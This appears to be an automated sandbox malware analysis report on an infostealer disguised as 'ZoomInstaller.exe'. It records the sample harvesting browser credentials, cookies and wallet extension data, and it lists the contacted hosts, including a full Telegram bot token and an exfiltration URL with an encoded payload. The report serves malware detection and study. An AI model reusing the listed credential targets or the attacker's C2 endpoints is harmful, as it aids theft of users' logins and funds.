    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Detected generic credential text file
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile created: C:\Users\user\AppData\Local\Ailurophile\Cookies\Google_Default.txtJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile created: C:\Users\user\AppData\Local\Ailurophile\Autofills\Autofills.txtJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile created: C:\Users\user\AppData\Local\Ailurophile\Cards\Cards.txtJump to behavior
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\khpkpbbcccdmmclmpigdgddabeilkdpdJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbhJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Neon\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\odbfpeeihdkbihmopkbjmoonfanlbfclJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcbigmjiafegjnnogedioegffbooigliJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiiooljJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibgJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjcaJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.dbJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.dbJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfkJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkibJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpnJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfndJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mdjmfdffdcmnoblignmgpommbefadffdJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web.dbJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnkJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\djclckkglechooblngghdinmeemkbgciJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\akoiaibnepcedcplijmiamnaigbepmcbJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieafJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\history.dbJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\history.dbJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ocglkepbibnalbgmbachknglpdipeoioJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
    Source: Yara matchFile source: Process Memory Space: ZoomInstaller.exe PID: 5368, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		11
    Process Injection    		1
    Masquerading    		1
    OS Credential Dumping    		1
    Query Registry    		Remote Services11
    Input Capture    		1
    Web Service    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts12
    Command and Scripting Interpreter    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Modify Registry    		11
    Input Capture    		11
    Security Software Discovery    		Remote Desktop Protocol1
    Archive Collected Data    		21
    Encrypted Channel    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)21
    Virtualization/Sandbox Evasion    		Security Account Manager2
    Process Discovery    		SMB/Windows Admin Shares21
    Data from Local System    		1
    Ingress Tool Transfer    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
    Process Injection    		NTDS21
    Virtualization/Sandbox Evasion    		Distributed Component Object ModelInput Capture3
    Non-Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information    		LSA Secrets1
    Application Window Discovery    		SSHKeylogging4
    Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Install Root Certificate    		Cached Domain Credentials1
    File and Directory Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading    		DCSync13
    System Information Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1544493 Sample: ZoomInstaller.exe Startdate: 29/10/2024 Architecture: WINDOWS Score: 76 43 api.telegram.org 2->43 45 manestvli.shop 2->45 47 api.myip.com 2->47 55 Suricata IDS alerts for network traffic 2->55 57 Machine Learning detection for sample 2->57 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 2->59 61 AI detected suspicious sample 2->61 8 ZoomInstaller.exe 25 2->8         started        signatures3 63 Uses the Telegram API (likely for C&C communication) 43->63 process4 dnsIp5 49 api.telegram.org 149.154.167.220, 443, 49980 TELEGRAMRU United Kingdom 8->49 51 manestvli.shop 188.114.97.3, 443, 49970 CLOUDFLARENETUS European Union 8->51 53 api.myip.com 104.26.9.59, 443, 49709 CLOUDFLARENETUS United States 8->53 35 C:\Users\user\AppData\Local\...\history.db, SQLite 8->35 dropped 37 C:\Users\user\AppData\Local\...\webdata.db, SQLite 8->37 dropped 39 C:\Users\user\AppData\Local\...\passwords.db, SQLite 8->39 dropped 41 5 other malicious files 8->41 dropped 65 Installs new ROOT certificates 8->65 67 Tries to harvest and steal browser information (history, passwords, etc) 8->67 69 Detected generic credential text file 8->69 13 powershell.exe 15 8->13         started        15 powershell.exe 15 8->15         started        17 powershell.exe 11 8->17         started        19 6 other processes 8->19 file6 signatures7 process8 process9 21 conhost.exe 13->21         started        23 conhost.exe 15->23         started        25 conhost.exe 17->25         started        27 conhost.exe 19->27         started        29 conhost.exe 19->29         started        31 conhost.exe 19->31         started        33 3 other processes 19->33

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    ZoomInstaller.exe0%ReversingLabs
    ZoomInstaller.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
    http://nuget.org/NuGet.exe0%URL Reputationsafe
    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    https://go.micro0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
    https://www.ecosia.org/newtab/0%URL Reputationsafe
    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://nuget.org/nuget.exe0%URL Reputationsafe
    https://oneget.orgX0%URL Reputationsafe
    https://aka.ms/pscore680%URL Reputationsafe
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
    https://oneget.org0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    api.myip.com
    		104.26.9.59
    		truefalse
      		unknown
      manestvli.shop
      		188.114.97.3
      		truetrue
        		unknown
        api.telegram.org
        		149.154.167.220
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://api.myip.com/false
            		unknown
            https://api.telegram.org/bot7576282251:AAG0mg-rIFL8SDgfm15Nk4l51UZeLB-cEwU/sendMessagefalse
              		unknown
              https://manestvli.shop/upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drTGVaZ3AxOTRJRGVqMlNEZGJDYXJxbXRwNWQ4cTJaOG5ubVpmOTFxcllLRnRLYXYwTGl1Z0tQRnFYeWRxOCtXcktLcmpvU3NaNnZSbEtlTmJLeW1sbVp0MDVhbmVJeVZpSmljeEpuSHNYMTlwNmQ4ZW5iZmxOMTNySUYwbDZpdTBLaHNnWDJ6WVh5ZHE4K1ZxM3l1bDJUSHA4WFR0YkY5bzlHWmdIZDkyWHZSaEtxV1k5ZWh2TDZ3b0lPaXE2bDhuYXZQaTd5TVpKWmp2YUhFcmR1eGZhUFJtWUNIZmRsNzBZU2NsNTYxcTZ2UTBxQ0JmS3VqZktHTzFwU3JqSzU5bTlLYXI2bXNxbjJtc0thWGkybVdsZEtobllPYXJZZkUwODluanBDemw0aG5oczZXcTR5dWZacmFtc2FZcWFxV2dMaGdmSjZqejMrM2Y2ZDluc3VoeFptMXJaZW56Wm1DblgzZGU5Sm1jUT09&hash=2d6441c1bfc749b0344ftrue
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drfalse
                • URL Reputation: safe
                		unknown
                http://nuget.org/NuGet.exepowershell.exe, 00000011.00000002.2563414828.00000160AE9C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2548489987.00000160A0157000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2563414828.00000160AE880000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F34AF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2725292106.0000022F43272000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2725292106.0000022F4312F000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000011.00000002.2548489987.000001609FF14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F347BF000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  https://api.myip.comZoomInstaller.exe, 00000000.00000002.2803793282.000000C000102000.00000004.00001000.00020000.00000000.sdmpfalse
                    		unknown
                    https://duckduckgo.com/ac/?q=ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drfalse
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000014.00000002.2682435219.0000022F332F2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000014.00000002.2682435219.0000022F332F2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        https://go.micropowershell.exe, 00000011.00000002.2548489987.000001609FA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F3427B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 00000014.00000002.2725292106.0000022F4312F000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://manestvli.shop/upload.php?ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0001CA000.00000004.00001000.00020000.00000000.sdmpfalse
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 00000014.00000002.2725292106.0000022F4312F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.org/bot%s/sendMessageZoomInstaller.exe, 00000000.00000002.2803793282.000000C00000E000.00000004.00001000.00020000.00000000.sdmpfalse
                            		unknown
                            https://www.ecosia.org/newtab/ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000014.00000002.2682435219.0000022F332F2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://manestvli.shop/upload.php?https://manestvli.shop/upload.php?ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0001CA000.00000004.00001000.00020000.00000000.sdmpfalse
                                		unknown
                                https://ac.ecosia.org/autocomplete?q=ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://manestvli.shop/upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drTZoomInstaller.exe, 00000000.00000002.2803793282.000000C000078000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://api.telegram.org/bot%s/sendMessagehttps://api.telegram.org/bot%s/sendMessagechat_id=68432125ZoomInstaller.exe, 00000000.00000002.2803793282.000000C00000E000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		unknown
